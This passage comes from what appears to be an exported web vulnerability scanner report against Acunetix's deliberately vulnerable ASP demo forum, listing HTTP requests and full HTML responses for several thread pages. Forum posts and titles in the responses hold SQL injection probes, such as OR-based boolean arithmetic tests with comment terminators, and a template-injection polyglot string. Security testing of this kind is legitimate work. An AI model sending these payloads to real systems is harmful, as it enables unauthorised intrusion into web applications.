attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=69 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=69 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4148 |
Response Body - size: 4,148 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D69" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:19 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3+689-689-1=0+0+0+1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4230 |
Response Body - size: 4,230 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=70 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=70 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4146 |
Response Body - size: 4,146 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:19 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2<(0+5+689-689)</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=71 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=71 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4146 |
Response Body - size: 4,146 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2>(0+5+689-689)</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=72 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=72 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4153 |
Response Body - size: 4,153 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 2+447-447-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=73 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=73 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4153 |
Response Body - size: 4,153 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:21 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3+447-447-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=74 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=74 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4151 |
Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:22 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2<(0+5+447-447) -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=75 |
Method | GET |
Parameter | |
Attack | |
